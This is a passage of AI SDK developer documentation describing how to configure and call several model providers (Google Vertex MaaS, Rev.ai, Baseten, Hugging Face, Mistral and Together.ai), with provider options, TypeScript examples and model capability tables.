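  prompt: 'What are the latest developments in quantum computing?',
  tools: { web_search: webSearchTool }, // assumed tool key
  stopWhen: stepCountIs(3),
});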
Model Capabilities
The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Computer Use |
|---|---|---|---|---|---|
| claude-3-7-sonnet@20250219 | | | | | |
| claude-3-5-sonnet-v2@20241022 | | | | | |
| claude-3-5-sonnet@20240620 | | | | | |
| claude-3-5-haiku@20241022 | | | | | |
| claude-3-sonnet@20240229 | | | | | |
| claude-3-haiku@20240307 | | | | | |
| claude-3-opus@20240229 | | | | | |
Google Vertex MaaS Provider Usage
The Google Vertex MaaS (Model as a Service) provider offers access to partner and open models hosted on Vertex AI through an OpenAI-compatible Chat Completions API. This includes models from DeepSeek, Qwen, Meta, MiniMax, Moonshot, and OpenAI.
For more information, see the Vertex AI MaaS documentation.
Provider Instance
You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
project: 'my-project', // optional
location: 'us-east5', // optional, defaults to 'global'
});
Node.js Runtime
For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
-
project string
The Google Cloud project ID. Defaults to the GOOGLE_VERTEX_PROJECT environment variable.
-
location string
The Google Cloud location, e.g. us-east5 or global. Defaults to the GOOGLE_VERTEX_LOCATION environment variable. If not set, defaults to global.
-
googleAuthOptions object
Optional. The Authentication options used by the Google Auth Library.
-
headers Resolvable<Record<string, string | undefined>>
Headers to include in requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Edge Runtime
For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:
import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';
To customize the setup, use createVertexMaas from the same module:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';
const vertexMaas = createVertexMaas({
project: 'my-project',
location: 'us-east5',
});
For Edge runtime authentication, set these environment variables:
- GOOGLE_CLIENT_EMAIL
- GOOGLE_PRIVATE_KEY
- GOOGLE_PRIVATE_KEY_ID (optional)
Language Models
You can create models using the provider instance. The first argument is the model ID:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Streaming is also supported:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';
const result = streamText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
Available Models
The following models are available through the MaaS provider. You can also pass any valid model ID as a string.
| Model ID | Provider |
|---|---|
| deepseek-ai/deepseek-r1-0528-maas | DeepSeek |
| deepseek-ai/deepseek-v3.1-maas | DeepSeek |
| deepseek-ai/deepseek-v3.2-maas | DeepSeek |
| openai/gpt-oss-120b-maas | OpenAI |
| openai/gpt-oss-20b-maas | OpenAI |
| meta/llama-4-maverick-17b-128e-instruct-maas | Meta |
| meta/llama-4-scout-17b-16e-instruct-maas | Meta |
| minimax/minimax-m2-maas | MiniMax |
| qwen/qwen3-coder-480b-a35b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-thinking-maas | Qwen |
| moonshotai/kimi-k2-thinking-maas | Moonshot |
title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.
Rev.ai Provider
The Rev.ai provider contains transcription model support for the Rev.ai transcription API.
Setup
The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn', 'bun']}>
Provider Instance
You can import the default provider instance revai from @ai-sdk/revai:
import { revai } from '@ai-sdk/revai';
If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:
import { createRevai } from '@ai-sdk/revai';
const revai = createRevai({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Rev.ai provider instance:
-
apiKey string
API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Transcription Models
You can create models that call the Rev.ai transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. machine.
const model = revai.transcription('machine');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { type RevaiTranscriptionModelOptions } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: revai.transcription('machine'),
audio: await readFile('audio.mp3'),
providerOptions: {
revai: { language: 'en' } satisfies RevaiTranscriptionModelOptions,
},
});
The following provider options are available:
-
metadata string
Optional metadata string to associate with the transcription job.
-
notification_config object
Configuration for webhook notifications when job is complete.
- url string - URL to send the notification to.
- auth_headers object - Optional authorization headers for the notification request.
- Authorization string - Authorization header value.
-
delete_after_seconds integer
Number of seconds after which the job will be automatically deleted.
-
verbatim boolean
Whether to include filler words and false starts in the transcription.
-
rush boolean
[HIPAA Unsupported] Whether to prioritize the job for faster processing. Only available for human transcriber option.
-
test_mode boolean
Whether to run the job in test mode. Default is false.
-
segments_to_transcribe Array
Specific segments of the audio to transcribe.
- start number - Start time of the segment in seconds.
- end number - End time of the segment in seconds.
-
speaker_names Array
Names to assign to speakers in the transcription.
- display_name string - Display name for the speaker.
-
skip_diarization boolean
Whether to skip speaker diarization. Default is false.
-
skip_postprocessing boolean
Whether to skip post-processing steps. Only available for English and Spanish languages. Default is false.
-
skip_punctuation boolean
Whether to skip adding punctuation to the transcription. Default is false.
-
remove_disfluencies boolean
Whether to remove disfluencies (um, uh, etc.) from the transcription. Default is false.
-
remove_atmospherics boolean
Whether to remove atmospheric sounds (like <laugh>, <affirmative>) from the transcription. Default is false.
-
filter_profanity boolean
Whether to filter profanity from the transcription by replacing characters with asterisks except for the first and last. Default is false.
-
speaker_channels_count integer
Number of speaker channels in the audio. Only available for English, Spanish and French languages.
-
speakers_count integer
Expected number of speakers in the audio. Only available for English, Spanish and French languages.
-
diarization_type string
Type of diarization to use. Possible values: "standard" (default), "premium".
-
custom_vocabulary_id string
ID of a custom vocabulary to use for the transcription, submitted through the Custom Vocabularies API.
-
custom_vocabularies Array
Custom vocabularies to use for the transcription.
-
strict_custom_vocabulary boolean
Whether to strictly enforce custom vocabulary.
-
summarization_config object
Configuration for generating a summary of the transcription.
- model string - Model to use for summarization. Possible values: "standard" (default), "premium".
- type string - Format of the summary. Possible values: "paragraph" (default), "bullets".
- prompt string - Custom prompt for the summarization (mutually exclusive with type).
-
translation_config object
Configuration for translating the transcription.
- target_languages Array - Target languages for translation. Each item is an object with:
- language string - Language code. Possible values: "en", "en-us", "en-gb", "ar", "pt", "pt-br", "pt-pt", "fr", "fr-ca", "es", "es-es", "es-la", "it", "ja", "ko", "de", "ru".
- model string - Model to use for translation. Possible values: "standard" (default), "premium".
-
language string
Language of the audio content, provided as an ISO 639-1 language code. Default is "en".
-
forced_alignment boolean
Whether to perform forced alignment, which provides improved accuracy for per-word timestamps. Default is false.
Currently supported languages:
- English (en, en-us, en-gb)
- French (fr)
- Italian (it)
- German (de)
- Spanish (es)
Note: This option is not available in low-cost environments.
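As a hedged sketch, several of these options can be combined in a single request; the audio file and option values are illustrative:
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('meeting.mp3'), // placeholder file
  providerOptions: {
    revai: {
      verbatim: true, // keep filler words and false starts
      speakers_count: 2, // expected number of speakers
      language: 'en',
    },
  },
});
console.log(result.text);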
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| machine | | | | |
| low_cost | | | | |
| fusion | | | | |
title: Baseten description: Learn how to use Baseten models with the AI SDK.
Baseten Provider
Baseten is an inference platform for serving frontier, enterprise-grade open-source AI models via their API.
Setup
The Baseten provider is available via the @ai-sdk/baseten module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn']}>
Provider Instance
You can import the default provider instance baseten from @ai-sdk/baseten:
import { baseten } from '@ai-sdk/baseten';
If you need a customized setup, you can import createBaseten from @ai-sdk/baseten
and create a provider instance with your settings:
import { createBaseten } from '@ai-sdk/baseten';
const baseten = createBaseten({
apiKey: process.env.BASETEN_API_KEY ?? '',
});
You can use the following optional settings to customize the Baseten provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://inference.baseten.co/v1. -
apiKey string
API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended that you set the environment variable using export so you do not need to include the field every time. You can grab your Baseten API key here.
-
modelURL string
Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Model APIs
You can select Baseten models using a provider instance.
The first argument is the model id, e.g. 'moonshotai/Kimi-K2-Instruct-0905'. The complete list of supported models under Model APIs can be found here.
const model = baseten('moonshotai/Kimi-K2-Instruct-0905');
Example
You can use Baseten language models to generate text with the generateText function:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'What is the meaning of life? Answer in one sentence.',
});
Baseten language models can also be used in the streamText function
(see AI SDK Core).
Dedicated Models
Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:
OpenAI-Compatible Endpoints (/sync/v1)
For models deployed with Baseten's OpenAI-compatible endpoints:
import { createBaseten } from '@ai-sdk/baseten';
const baseten = createBaseten({
modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
model: model,
prompt: 'Say hello from a Baseten chat model!',
});
/predict Endpoints
/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.
Embedding Models
You can create models that call the Baseten embeddings API using the .embeddingModel() factory method. The Baseten provider uses the high-performance @basetenlabs/performance-client for optimal embedding performance.
import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';
const baseten = createBaseten({
modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});
const embeddingModel = baseten.embeddingModel();
// Single embedding
const { embedding } = await embed({
model: embeddingModel,
value: 'sunny day at the beach',
});
// Batch embeddings
const { embeddings } = await embedMany({
model: embeddingModel,
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy mountain peak',
],
});
Endpoint Support for Embeddings
Supported:
- /sync endpoints (Performance Client automatically adds /v1/embeddings)
- /sync/v1 endpoints (automatically strips /v1 before passing to Performance Client)
Not Supported:
- /predict endpoints (not compatible with Performance Client)
Performance Features
The embedding implementation includes:
- High-performance client: Uses @basetenlabs/performance-client for optimal performance
- Automatic batching: Efficiently handles multiple texts in a single request
- Connection reuse: Performance Client is created once and reused for all requests
- Built-in retries: Automatic retry logic for failed requests
Error Handling
The Baseten provider includes built-in error handling for common API errors:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
try {
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'Hello, world!',
});
} catch (error) {
console.error('Baseten API error:', error.message);
}
Common Error Scenarios
// Embeddings require a modelURL
try {
baseten.embeddingModel();
} catch (error) {
// Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}
// /predict endpoints are not supported for chat models
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}
// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.embeddingModel(); // This works fine!
// /predict endpoints are not supported for embeddings
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten.embeddingModel(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}
// Image models are not supported
try {
baseten.imageModel('test-model');
} catch (error) {
// Error: NoSuchModelError for imageModel
}
title: Hugging Face description: Learn how to use Hugging Face Provider.
Hugging Face Provider
The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.
API keys can be obtained from Hugging Face Settings.
Setup
The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:
<Tabs items={['pnpm', 'npm', 'yarn', 'bun']}>
Provider Instance
You can import the default provider instance huggingface from @ai-sdk/huggingface:
import { huggingface } from '@ai-sdk/huggingface';
For custom configuration, you can import createHuggingFace and create a provider instance with your settings:
import { createHuggingFace } from '@ai-sdk/huggingface';
const huggingface = createHuggingFace({
apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});
You can use the following optional settings to customize the Hugging Face provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://router.huggingface.co/v1. -
apiKey string
API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const { text } = await generateText({
model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .responses() or .languageModel() factory methods:
const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');
Hugging Face language models can be used in the streamText function
(see AI SDK Core).
You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.
Provider Options
Hugging Face language models support provider-specific options that you can pass via providerOptions.huggingface:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const { text } = await generateText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'Explain the theory of relativity.',
providerOptions: {
huggingface: {
reasoningEffort: 'high',
instructions: 'Respond in a clear and educational manner.',
},
},
});
The following provider options are available:
-
metadata Record<string, string>
Additional metadata to include with the request.
-
instructions string
Instructions for the model. Can be used to provide additional context or guidance.
-
strictJsonSchema boolean
Whether to use strict JSON schema validation for structured outputs. Defaults to false.
-
reasoningEffort string
Controls the reasoning effort for reasoning models like DeepSeek-R1. Higher values result in more thorough reasoning.
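For example, a sketch combining strictJsonSchema with structured outputs via Output; the schema and model id are illustrative:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
  providerOptions: {
    huggingface: { strictJsonSchema: true }, // enforce strict schema validation
  },
  output: Output.object({
    schema: z.object({ city: z.string(), country: z.string() }), // illustrative schema
  }),
  prompt: 'Name a European capital city and its country.',
});
console.log(result.output);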
Reasoning Output
For reasoning models like deepseek-ai/DeepSeek-R1, you can control the reasoning effort and access the model's reasoning process in the response:
import { huggingface } from '@ai-sdk/huggingface';
import { streamText } from 'ai';
const result = streamText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'How many r letters are in the word strawberry?',
providerOptions: {
huggingface: {
reasoningEffort: 'high',
},
},
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(`Reasoning: ${part.textDelta}`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
For non-streaming calls with generateText, the reasoning content is available in the reasoning field of the response:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const result = await generateText({
model: huggingface('deepseek-ai/DeepSeek-R1'),
prompt: 'What is 25 * 37?',
providerOptions: {
huggingface: {
reasoningEffort: 'medium',
},
},
});
console.log('Reasoning:', result.reasoning);
console.log('Answer:', result.text);
Image Input
For vision-capable models like Qwen/Qwen2.5-VL-7B-Instruct, you can pass images as part of the message content:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const result = await generateText({
model: huggingface('Qwen/Qwen2.5-VL-7B-Instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe this image in detail.' },
{
type: 'image',
image: readFileSync('./image.png'),
},
],
},
],
});
You can also pass image URLs:
{
type: 'image',
image: 'https://example.com/image.png',
}
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.1-70B-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Llama-4-Maverick-17B-128E-Instruct | | | | |
| deepseek-ai/DeepSeek-V3.1 | | | | |
| deepseek-ai/DeepSeek-V3-0324 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| Qwen/Qwen3-32B | | | | |
| Qwen/Qwen3-Coder-480B-A35B-Instruct | | | | |
| Qwen/Qwen2.5-VL-7B-Instruct | | | | |
| google/gemma-3-27b-it | | | | |
| moonshotai/Kimi-K2-Instruct | | | | |
title: Mistral AI description: Learn how to use Mistral.
Mistral AI Provider
The Mistral AI provider contains language model support for the Mistral chat API.
Setup
The Mistral provider is available in the @ai-sdk/mistral module. You can install it with
<Tabs items={['pnpm', 'npm', 'yarn', 'bun']}>
Provider Instance
You can import the default provider instance mistral from @ai-sdk/mistral:
import { mistral } from '@ai-sdk/mistral';
If you need a customized setup, you can import createMistral from @ai-sdk/mistral
and create a provider instance with your settings:
import { createMistral } from '@ai-sdk/mistral';
const mistral = createMistral({
// custom settings
});
You can use the following optional settings to customize the Mistral provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.mistral.ai/v1. -
apiKey string
API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
You can create models that call the Mistral chat API using a provider instance.
The first argument is the model id, e.g. mistral-large-latest.
Some Mistral chat models support tool calls.
const model = mistral('mistral-large-latest');
Mistral chat models also support additional model settings that are not part of the standard call settings.
You can pass them as an options argument and utilize MistralLanguageModelOptions for typing:
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const model = mistral('mistral-large-latest');
await generateText({
model,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
mistral: {
safePrompt: true, // optional safety prompt injection
parallelToolCalls: false, // disable parallel tool calls (one tool per response)
} satisfies MistralLanguageModelOptions,
},
});
The following optional provider options are available for Mistral models:
-
safePrompt boolean
Whether to inject a safety prompt before all conversations. Defaults to false.
-
documentImageLimit number
Maximum number of images to process in a document.
-
documentPageLimit number
Maximum number of pages to process in a document.
-
strictJsonSchema boolean
Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided. Defaults to false.
-
structuredOutputs boolean
Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema. Defaults to true.
-
parallelToolCalls boolean
Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response. Defaults to true.
Document OCR
Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('mistral-small-latest'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
// optional settings:
providerOptions: {
mistral: {
documentImageLimit: 8,
documentPageLimit: 64,
} satisfies MistralLanguageModelOptions,
},
});
Reasoning Models
Mistral offers reasoning models that provide step-by-step thinking capabilities:
- magistral-small-2507: Smaller reasoning model for efficient step-by-step thinking
- magistral-medium-2507: More powerful reasoning model balancing performance and cost
These models return structured reasoning content that the AI SDK extracts automatically. The reasoning is available via the reasoningText property in the result:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('magistral-small-2507'),
prompt: 'What is 15 * 24?',
});
console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."
console.log('ANSWER:', result.text);
// Output: "360"
The SDK automatically parses Mistral's native reasoning format and provides separate reasoningText and text properties in the result. No middleware is needed.
Configurable Reasoning
Some Mistral models support configurable reasoning, which you can control via the reasoning parameter.
You can use the AI SDK's top-level reasoning setting to control reasoning effort:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const result = await generateText({
model: mistral('mistral-small-latest'),
reasoning: 'high',
prompt: 'What is 15 * 24?',
});
console.log('REASONING:', result.reasoningText);
console.log('ANSWER:', result.text);
Mistral currently supports only 'high' and 'none' as effort levels.
Example
You can use Mistral language models to generate text with the generateText function:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const { text } = await generateText({
model: mistral('mistral-large-latest'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Mistral language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Structured Outputs
Mistral chat models support structured outputs using JSON Schema. You can use generateText or streamText with Output
and Zod, Valibot, or raw JSON Schema. The SDK sends your schema via Mistral's response_format: { type: 'json_schema' }.
import { mistral } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: mistral('mistral-large-latest'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
You can enable strict JSON Schema validation using a provider option:
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: mistral('mistral-large-latest'),
providerOptions: {
mistral: {
strictJsonSchema: true,
} satisfies MistralLanguageModelOptions,
},
output: Output.object({
schema: z.object({
title: z.string(),
items: z.array(
z.object({ id: z.string(), qty: z.number().int().min(1) }),
),
}),
}),
prompt: 'Generate a small shopping list.',
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| pixtral-large-latest | | | | |
| mistral-large-latest | | | | |
| mistral-medium-latest | | | | |
| mistral-medium-2508 | | | | |
| mistral-medium-2505 | | | | |
| mistral-small-latest | | | | |
| magistral-small-2507 | | | | |
| magistral-medium-2507 | | | | |
| magistral-small-2506 | | | | |
| magistral-medium-2506 | | | | |
| ministral-3b-latest | | | | |
| ministral-8b-latest | | | | |
| pixtral-12b-2409 | | | | |
| open-mistral-7b | | | | |
| open-mixtral-8x7b | | | | |
| open-mixtral-8x22b | | | | |
Embedding Models
You can create models that call the Mistral embeddings API
using the .embedding() factory method.
const model = mistral.embedding('mistral-embed');
You can use Mistral embedding models to generate embeddings with the embed function:
import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';
const { embedding } = await embed({
model: mistral.embedding('mistral-embed'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Default Dimensions |
|---|---|
| mistral-embed | 1024 |
title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.
Together.ai Provider
The Together.ai provider contains support for 200+ open-source models through the Together.ai API.
Setup
The Together.ai provider is available via the @ai-sdk/togetherai module. You can
install it with
<Tabs items={['pnpm', 'npm', 'yarn', 'bun']}>
Provider Instance
You can import the default provider instance togetherai from @ai-sdk/togetherai:
import { togetherai } from '@ai-sdk/togetherai';
If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai
and create a provider instance with your settings:
import { createTogetherAI } from '@ai-sdk/togetherai';
const togetherai = createTogetherAI({
apiKey: process.env.TOGETHER_API_KEY ?? '',
});
You can use the following optional settings to customize the Together.ai provider instance:
-
baseURL string
Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is
https://api.together.xyz/v1. -
apiKey string
API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
-
headers Record<string,string>
Custom headers to include in the requests.
-
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.
const model = togetherai('google/gemma-2-9b-it');
Reasoning Models
Together.ai exposes the thinking of deepseek-ai/DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: togetherai('deepseek-ai/DeepSeek-R1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
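For instance, a brief sketch of using the wrapped model; the prompt is illustrative, and reasoningText follows the result shape used elsewhere in these docs:
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: enhancedModel, // the wrapped model from above
  prompt: 'How many prime numbers are there below 20?',
});
console.log('REASONING:', reasoningText);
console.log('ANSWER:', text);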
Example
You can use Together.ai language models to generate text with the generateText function:
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';
const { text } = await generateText({
model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Together.ai language models can also be used in the streamText function
(see AI SDK Core).
The Together.ai provider also supports completion models via togetherai.completionModel() and embedding models via togetherai.embeddingModel(), following the pattern in the example code above.
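As a sketch, the completion-model factory could be used like this; the model id is an illustrative assumption:
import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: togetherai.completionModel('codellama/CodeLlama-34b-Instruct-hf'), // assumed model id
  prompt: 'def fibonacci(n):',
});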
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| moonshotai/Kimi-K2.5 | | | | |
| Qwen/Qwen3.5-397B-A17B | | | | |
| MiniMaxAI/MiniMax-M2.5 | | | | |
| zai-org/GLM-5 | | | | |
| deepseek-ai/DeepSeek-V3.1 | | | | |
| openai/gpt-oss-120b | | | | |
| openai/gpt-oss-20b | | | | |
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
Image Models
You can create Together.ai image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { togetherai } from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});
You can pass optional provider-specific request parameters using the providerOptions argument.
import {
togetherai,
type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-dev'),
prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
size: '512x512',
// Optional additional provider-specific request parameters
providerOptions: {
togetherai: {
steps: 40,
} satisfies TogetherAIImageModelOptions,
},
});
The following provider options are available:
-
steps number
Number of generation steps. Higher values can improve quality.
-
guidance number
Guidance scale for image generation.
-
negative_prompt string
Negative prompt to guide what to avoid.
-
disable_safety_checker boolean
Disable the safety checker for image generation. When true, the API will not reject images flagged as potentially NSFW. Not available for Flux Schnell Free and Flux Pro models.
Image Editing
Together AI supports image editing through FLUX Kontext models. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { togetherai, type TogetherAIImageModelOptions } from '@ai-sdk/togetherai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
size: '1024x1024',
providerOptions: {
togetherai: {
steps: 28,
} satisfies TogetherAIImageModelOptions,
},
});
Editing with URL Reference
You can also pass image URLs directly:
const { images } = await generateImage({
model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
prompt: {
